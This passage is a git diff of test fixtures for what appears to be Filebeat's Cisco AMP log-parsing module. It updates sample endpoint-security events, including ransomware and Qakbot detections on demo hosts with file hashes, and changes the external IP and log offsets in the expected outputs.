+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json
index 528747f4ef22..33812fe19872 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json
@@ -3,7 +3,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -46,7 +46,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -58,7 +58,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -92,7 +92,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 1193,
+        "log.offset": 1198,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -101,7 +101,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -113,7 +113,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -147,7 +147,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 2379,
+        "log.offset": 2389,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -156,7 +156,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -168,7 +168,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -202,7 +202,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 3572,
+        "log.offset": 3587,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -211,7 +211,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -223,7 +223,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -257,7 +257,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 4765,
+        "log.offset": 4785,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -266,7 +266,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -278,7 +278,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -312,7 +312,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 5950,
+        "log.offset": 5975,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -321,7 +321,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -333,7 +333,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -371,7 +371,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 7136,
+        "log.offset": 7166,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -380,7 +380,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -396,7 +396,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -437,7 +437,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 8409,
+        "log.offset": 8444,
         "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
         "process.name": "tasksche.exe",
         "process.pid": 1008,
@@ -451,7 +451,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -467,7 +467,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -505,7 +505,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 9938,
+        "log.offset": 9978,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -514,7 +514,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -530,7 +530,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -568,7 +568,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 11210,
+        "log.offset": 11255,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -577,7 +577,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -593,7 +593,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -625,7 +625,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 12488,
+        "log.offset": 12538,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -634,7 +634,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -646,7 +646,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -678,7 +678,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 13608,
+        "log.offset": 13663,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -687,7 +687,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -699,7 +699,7 @@
         "@timestamp": "2021-01-14T14:41:05.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -731,7 +731,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 14728,
+        "log.offset": 14788,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -740,7 +740,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -752,7 +752,7 @@
         "@timestamp": "2021-01-14T14:41:04.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -790,7 +790,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 15848,
+        "log.offset": 15913,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -799,7 +799,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -815,7 +815,7 @@
         "@timestamp": "2021-01-14T14:41:04.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -856,7 +856,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 17121,
+        "log.offset": 17191,
         "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98",
         "process.hash.sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5",
         "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae",
@@ -872,7 +872,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -888,7 +888,7 @@
         "@timestamp": "2021-01-14T14:41:04.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -929,7 +929,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 18745,
+        "log.offset": 18820,
         "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
         "process.name": "tasksche.exe",
         "process.pid": 4772,
@@ -943,7 +943,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -959,7 +959,7 @@
         "@timestamp": "2021-01-14T14:41:04.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -998,7 +998,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 20287,
+        "log.offset": 20367,
         "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
         "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
         "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -1012,7 +1012,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1028,7 +1028,7 @@
         "@timestamp": "2021-01-14T14:41:03.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1069,7 +1069,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 21793,
+        "log.offset": 21878,
         "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
         "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
         "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -1085,7 +1085,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1101,7 +1101,7 @@
         "@timestamp": "2021-01-14T14:37:40.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1135,7 +1135,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 23391,
+        "log.offset": 23481,
         "related.hash": [
             "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
         ],
@@ -1144,7 +1144,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1156,7 +1156,7 @@
         "@timestamp": "2021-01-14T14:37:40.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1190,7 +1190,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 24592,
+        "log.offset": 24687,
         "related.hash": [
             "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
         ],
@@ -1199,7 +1199,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1211,7 +1211,7 @@
         "@timestamp": "2021-01-14T14:37:40.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1243,7 +1243,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 25793,
+        "log.offset": 25893,
         "related.hash": [
             "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
         ],
@@ -1252,7 +1252,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1264,7 +1264,7 @@
         "@timestamp": "2021-01-14T14:37:40.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1302,7 +1302,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 26906,
+        "log.offset": 27011,
         "related.hash": [
             "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
         ],
@@ -1311,7 +1311,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1323,7 +1323,7 @@
         "@timestamp": "2021-01-14T14:37:40.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1361,7 +1361,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 28140,
+        "log.offset": 28250,
         "related.hash": [
             "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
         ],
@@ -1370,7 +1370,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1382,7 +1382,7 @@
         "@timestamp": "2021-01-14T14:37:40.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1422,7 +1422,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 29393,
+        "log.offset": 29508,
         "related.hash": [
             "6894b3834bd541fa85df79e44568acac",
             "8cf0ca99a8f5019d8583133b9a9379299c45470c",
@@ -1433,7 +1433,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1447,7 +1447,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1482,7 +1482,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 30752,
+        "log.offset": 30872,
